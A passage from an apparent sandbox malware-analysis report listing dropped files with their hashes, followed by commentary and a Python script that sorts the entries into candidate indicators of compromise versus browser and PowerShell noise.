SHA2564bf09bd4a0917dbd75e2a492b7d818b0fa12e58013cd869009d8e9ab3de1b16c
SHA512e656d8d42720be26a3f790889f33d94c90c4a4feadb7640d5a03f2e170ea0055e0cd49b18009cc8d1b442be25d5d32e29f91b8b23c93309b45e238ae20312600
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13360620960560119Filesize
933B
MD5399f4f47349551c65529f04981abd6c0
SHA1b7db43f5ab8135d5f88ea440b4f646275716b9f2
SHA2567293d04f90f15373da9a5c8713c88c927c98232b90ee692e2ad3f18e8fbaf993
SHA512406ac644862c2f33cb61149ad12bcf47240f4d729920c4dc44899d57d2d3ce2941d46ff1c955a2ac1788ea430d7f2ed1ca5ef0e584a2ea2d123edbc4a84e513e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ShortcutsFilesize
20KB
MD5fca621466ede4c2499ecb9f3728e63ab
SHA13d5d4cd0fa702371f9d1a40e72e1fe19d194a3c4
SHA256c6dde84fb40fb69d1a6637fe6bf781de51a4c24e45b616e8f97afd3c6fe200b8
SHA512aa12ed8c1ff85af4375ac80d7fe494d6f8a70ddb3357c186a0c1ade9bbcc3efc3de5fb0ad4b81eb2ab9bc916b6adf8b76c30203f78e38cd00af5fa4ccf3e3760
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOGFilesize
350B
MD5ef957349084b1173d0f33b468efc601d
SHA11e069fd2d51ac5ce15ed6bb97a5b7bb1d5540b09
SHA256a65bb55d4dfec9f4a2dd0a69311d665ad93931edf2fb4c7ec5ef3d9868e30edb
SHA512bcec4780ca242d69bc26f8fed2b090267b94172ab5452edf3670411b8744a304b946fd0c27fa478497bc736a2ef2b1feb54d2553c7bd4a29832c3fb116bd02e4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOGFilesize
323B
MD563f20def912eb16310eb9d8ac6cc291a
SHA1706aacceca8e02d575f0c9d83280cf1caa68ae86
SHA256b7af2545f0427b0839da8ff0ae3ba98a7ff564635d9d207ebe295ae922819991
SHA5121cc3e69cfdaa3c29aeec77dc34059b3b71bbb3a96345787dc6c16a8da5fffb1ad923686b707bab425fa79e03b624cdc4851a9f1a1e0f2829d4a03965f4399346
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited LinksFilesize
128KB
MD5aced0e90b7e2b2f643e4d7710ced39d7
SHA1ede1baa9d1f4730a12108c26092e104c11b880b7
SHA25662173dfe01638bcb5fde58dbce6a4f04920435c9f67a80220e5915daa622ce51
SHA51265dc2199f789207a116a9c6613611a4ec9bd0aa74a76d8272ae4e71781f6d6b2e1ec39aaa2dacc21e76e1b3228cc19305ae49d071a2189d948ed6ff6a9e030d9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOGFilesize
198B
MD5f70f01a098339f4ac0622a52ed61812a
SHA1c4782d14eea2a3b359fe8a72e1d20a1a863eab69
SHA256d649000d5785eb36d69ee316a5c7f59fe8d46fada951aa69ce5bee95cccb47c1
SHA512a1c7e6cc65be38ffe527a17692def01fb9019ff5b770e619a4e054cbc4304753bdc37ece26b543b52f8355050f169abd5be13bc3ed8bfd936982df701b0baec9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002Filesize
50B
MD522bf0e81636b1b45051b138f48b3d148
SHA156755d203579ab356e5620ce7e85519ad69d614a
SHA256e292f241daafc3df90f3e2d339c61c6e2787a0d0739aac764e1ea9bb8544ee97
SHA512a4cf1f5c74e0df85dda8750be9070e24e19b8be15c6f22f0c234ef8423ef9ca3db22ba9ef777d64c33e8fd49fada6fcca26c1a14ba18e8472370533a1c65d8d0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.dbFilesize
16KB
MD59e02552124890dc7e040ce55841d75a4
SHA1f4179e9e3c00378fa4ad61c94527602c70aa0ad9
SHA2567b6e4ce73ddd8b5e7a7c4a94374ac2815d0048a5296879d7659a92ee0b425c77
SHA5123e10237b1bff73f3bb031f108b8de18f1b3c3396d63dfee8eb2401ce650392b9417143a9ef5234831d8386fc12e232b583dd45eada3f2828b3a0a818123dd5cd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-walFilesize
177KB
MD5d618b67097f828d2010fb5d0e74c987b
SHA192d6a39b730af8840981376bf76d5d3e548d26be
SHA256c937b2128e77baa1c4b4a49dd34b55bfafe53327a7c7b738a3ddec9cc6c85eea
SHA512bec24f5fdeef2bab04b0b327c93466706004b61cb71c41d8924aac230c24210be915a9cc366bd99a8a169e8648dcd5f026d8fa567a8815c1bd96b362fbddffe1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.logFilesize
187B
MD54a890675ec63575da12a3d09af0f43d3
SHA1bc585ed72198351d66a9f220c6d3a69be5621aac
SHA2565bb3df7918d2009ad79929503414ae654579fd0b1d74d08a5fb075c99f40cca4
SHA512e9c20c911b1754ee30cb49e1a8aed4778aa71903a88f41d328491ffab194a629d0217ef8db13b5083c36a604d3f92bf5838b1e06b635f87ed0921eddefc97ac4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOGFilesize
319B
MD549a1201fb21226aa0b7532c55ff4fd40
SHA1e5dc6fe907a74a179c09601032fcff399b7da34c
SHA256504244d42c624f630adc0195634019943e67bd3b0bfa0dc2010084020fe61744
SHA512261d8cacf42e4a869d6587ef8cdc9c454ea089dc01f80534c12f1cfba007727b1eae90666a6a340ba3db98561340113e234e199b452636d34c272fd12d8c0c9d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.logFilesize
594B
MD5c7d82d3c20338e91384c159a989d5f5d
SHA15f82f9fcee48e891e631e08d6d87f6fe865112e0
SHA256cb2ccf6b13d83d16ff65945d363ae269221da8db017ca6b36c446a1850ffa8dc
SHA5126c93b4afdb047d68ef49a363b6f191fe5eee4bde198c92e07d044b599a4371162decf2f5ad12109dedcd0a17a84a1ecc32108cd5419894a8f26b2cb818f6143e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOGFilesize
337B
MD56afccce754297e5dd3754727e80b6f77
SHA1f8768cc0093d26f2b3f8c8fd6759ddb5a97c8146
SHA2561b6ba353c9a64f570ebc1e05d92d77cda177fee5cfb75261294c6068e7c5cd68
SHA512caf68f23973f83328fa8a25f8088549efad0e11eec5fd832e80fb8efe626316266eaf9f4764d789dfca18f72a97f4f579283d820a3c32512dd956bdea5c1884f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0Filesize
44KB
MD5163c653b1952e9b1bf710cfa65b5f1dc
SHA11d11c24fafda3672f6a344a035030d05b67592f1
SHA25678250de0ec0be72a0642661609cf2be39e67692cfdc489ff8eddb637d21961ce
SHA512b7f0f0d1976a721fef2de80602692c85cdfa2c90c2578e55bbeaab8bc9f1597ab190e22817db913d97760b6409b8458bcb0c4460de53df8b651825f98fa369f5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1Filesize
264KB
MD54e5be79cdb248e2b5e9332d9fe38150c
SHA162bf86f0dd94a1ec05ade46a724655e071c40a49
SHA256a237bf0d3828972604b93b6398ed01c8ab7a33e51887158d5061eae334899d22
SHA512b76b4b669d69a8088a2a7d88f47356360d2126c106f97670429ba4665385c6d143aa7593f8292303c45d93330b0a0de86d34cb58e780810dc9bddcb6282bf658
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3Filesize
4.0MB
MD5019e334057588087a1d13e80727ba10c
SHA18b6ba62e627c2a51dfc7c4d45c4087a0182987c8
SHA2569f776bd8e4cc46effb0505b3ea9effc65640da9ce25e59c99e91deebb60191e1
SHA5126b2a68cd247360071b2e49b8ab0f4eb996c0eeaf07d4cf2cfb3297474bfed267f944847ebc5c45643658154b7029ad041ae1a5619c2aae4f0ca09e4a2f0ea802
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last BrowserFilesize
120B
MD5a397e5983d4a1619e36143b4d804b870
SHA1aa135a8cc2469cfd1ef2d7955f027d95be5dfbd4
SHA2569c70f766d3b84fc2bb298efa37cc9191f28bec336329cc11468cfadbc3b137f4
SHA5124159ea654152d2810c95648694dd71957c84ea825fcca87b36f7e3282a72b30ef741805c610c5fa847ca186e34bde9c289aaa7b6931c5b257f1d11255cd2a816
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last VersionFilesize
11B
MD5838a7b32aefb618130392bc7d006aa2e
SHA15159e0f18c9e68f0e75e2239875aa994847b8290
SHA256ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA5129e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5e45df01867921c09147ebc838115ded7
SHA190837a17acb4e9743ebf6a51a82613bc4d4355c5
SHA2560835b8a3af2c6c7ab59c6ec20bce4124878623516d5a8de35c5045f1fb806d5f
SHA512a6849314e2c4366f88a9fa31c0c0f7dae002c531ea4d3b1ef775d7b3c7b707d976d48269833582accf3bb3fc662d609b0563fff6f215ce626e1069455d540cd0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5f550c380dd1cbf3b0146563aeffaebbc
SHA1e2d442e87bc6692169d08b0a69a1b4503bb41440
SHA2569026f1f45c4bcf18e75f5dbb498f9a1546530d03ea5cbdb7bef84ad580aa9de4
SHA5129fc806088796fef3d3c9fd7f698dcca2155714e81526ff727c035a9a798fbe612d3553090a74df14c5d181a75e98c95b79da96034765e04a072d7bac43384a28
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbresFilesize
4KB
MD51eaa1674380df2e85f948ab3645b6a2d
SHA1cca11a2d973150990fd8bafea1cecbfee1fd5704
SHA256e6a07e925e9e14279a6ea3124c2018e090beca3ebfbc78e714c605786e3e9388
SHA512beb83f8f9e8371581eee4f4b18a4386532c4777acf5e7c4aae92226401f49a68876179121f0fd9993878cc003da814ac6e86f5a64d3f156256492ccb7a907ee3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e3b90537044a639dc6154f7eba9c8404
SHA1dec8d4d8f0a9a8866babb6f17dd68d8a54e7f47a
SHA256e0df7204949b2bf43825bfed4b611728bcf2683aabb280d4b4342a75cab34662
SHA5123ad09f527b0475c847881c916e4f3854e3846e86b699f9194318ccda9b75af18cb7b02e6127f98ea17872cc6fe6f6731e73cbd39177bf56a3561450aebf463d6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5235a8eb126d835efb2e253459ab8b089
SHA1293fbf68e6726a5a230c3a42624c01899e35a89f
SHA2565ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dlw4m3ai.1ny.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\disable_winload.regFilesize
91B
MD547b5ae368c4aff20eafa90ffdcd03a34
SHA1dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81
SHA256aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07
SHA512c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.dbFilesize
1024KB
MD5b0bcb925d85cd65cc926570d3dfed96e
SHA123c123a744528fbd7325a597ebbc7c75e6ea853d
SHA256cb215908a1c883d3cfb7ed6157d42af6da3a8fcf5993f3f3d582c5f7ec683d23
SHA512a0037f1ef86a4c2eeef6b19de16d6d71eff35aaff9daedfbc7f8227305d8acc8d36e119c590ef1ca6d3a25e2bbb0b6e91202ec93c1b22e7b961e00e839d8ba94
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
7KB
MD5a1dfdeb0848c46179d0d882ffe23d376
SHA18d52d9199d3bd2b12ba714fcf978eb7e44e46d07
SHA256aeeeb2061f29f4e7633b58063d231debddb3110fde08ecf97bc25b76dcf491b0
SHA512aba22cbaeb799cfea34c3a0a9c4a5d6822e40622f52df061097b5e77cc5cb329f75b8c7ae654b8f0944f4fbf2ba2d63f6352693fafb9cd11bb1df3fb249a62aa
-
\??\pipe\LOCAL\crashpad_4844_NVNBMRQCICKMXHHCMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/2692-5-0x0000016E53E70000-0x0000016E53E92000-memory.dmpFilesize
136KB
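Most of the listing above is not sample-specific: the `Edge\User Data` files are created by the browser the script launched, `__PSScriptPolicyTest_*.ps1`, `StartupProfileData-NonInteractive` and `CLR_v4.0\UsageLogs\powershell.exe.log` only show that PowerShell ran, and the crashpad pipe entry carries the MD5/SHA-1/SHA-256/SHA-512 digests of empty input (d41d8cd9…, da39a3ee…, e3b0c442…, cf83e135…), so none of those hashes is usable as an indicator. The one path here that is neither a Windows nor an Edge artifact is `Temp\disable_winload.reg`. The script below is an added example, not part of the report: it parses the listing in the exact flattened form shown above (label fused to the file name, and the pipe entry with no size line), recomputes the empty-input digests instead of hard-coding them, and sorts entries into candidate indicators versus noise. The noise rules are the example's own assumptions.

```python
# Added example: parse the report's dropped-file listing and sort entries into IOC candidates
# versus sandbox/Windows noise.
from __future__ import annotations
import hashlib
import re
from dataclasses import dataclass

DIGEST = re.compile(r"^(SHA512|SHA256|SHA1|MD5)([0-9a-f]+)$")   # label fused to the hex digest
HEX32 = re.compile(r"^[0-9a-f]{32}$")
# Digests of empty input: an entry carrying exactly these was captured with no content at all.
EMPTY = {a: hashlib.new(a.lower(), b"").hexdigest() for a in ("MD5", "SHA1", "SHA256", "SHA512")}

@dataclass
class Entry:
    path: str
    size: str | None      # as printed ("2KB", "152B"); None for entries listed without one
    digests: dict[str, str]

def parse_entry(lines: list[str]) -> Entry:
    head = lines[0]
    if head.endswith("Filesize"):
        path, size, rest = head[: -len("Filesize")], lines[1], lines[2:]
    elif head.endswith("MD5") and HEX32.match(lines[1]):   # pipe entries: no size, label fused to the name
        path, size, rest = head[:-3], None, ["MD5" + lines[1]] + lines[2:]
    else:
        raise ValueError(f"unrecognised entry header: {head}")
    digests = {m.group(1): m.group(2) for m in map(DIGEST.match, rest) if m}
    return Entry(path, size, digests)

def parse_listing(text: str) -> list[Entry]:
    entries, block = [], []
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if line == "-":
            if block:
                entries.append(parse_entry(block))
            block = []
        else:
            block.append(line)
    if block:
        entries.append(parse_entry(block))
    return entries

def classify(e: Entry) -> str:
    if e.digests and all(EMPTY.get(a) == h for a, h in e.digests.items()):
        return "empty-input digest: not an IOC"
    p = e.path.lower()
    if "\\microsoft\\edge\\user data\\" in p:
        return "browser profile noise"
    if "__psscriptpolicytest_" in p or "startupprofiledata" in p or p.endswith("\\usagelogs\\powershell.exe.log"):
        return "powershell execution artifact"
    return "candidate IOC"

def triage_listing(text: str) -> list[tuple[str, str]]:
    return [(e.path, classify(e)) for e in parse_listing(text)]

# Five entries copied verbatim from the report's listing (the layout is the report's own).
RAW = r"""
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD59be60d1c7db05918d977790c37ffd5d5
SHA140653b45e82ba27cc724d8ba45914c45c8503c9d
SHA2564f50b8ee1676079d53210e20b3a10f8f490cead0dbf9ee02238d7dd317f9cdf5
SHA51215f3ea65119d356a1693747c5631838ec79df11525c0320fb0fb37a92241e8073855ec4f44237dec142fab16b7c375bd76cc9d63471cb10d1003a3136dfe6629
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dlw4m3ai.1ny.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\disable_winload.regFilesize
91B
MD547b5ae368c4aff20eafa90ffdcd03a34
SHA1dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81
SHA256aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07
SHA512c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f
-
\??\pipe\LOCAL\crashpad_4844_NVNBMRQCICKMXHHCMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""

if __name__ == "__main__":
    for path, verdict in triage_listing(RAW):
        print(f"{verdict:34} {path}")
```

Run against the full listing, only the Temp .reg file survives as something worth pivoting on; the Edge and PowerShell entries will reappear, with different hashes, in any run of any sample that opens a browser or a PowerShell host, so hunting on them produces nothing but false positives.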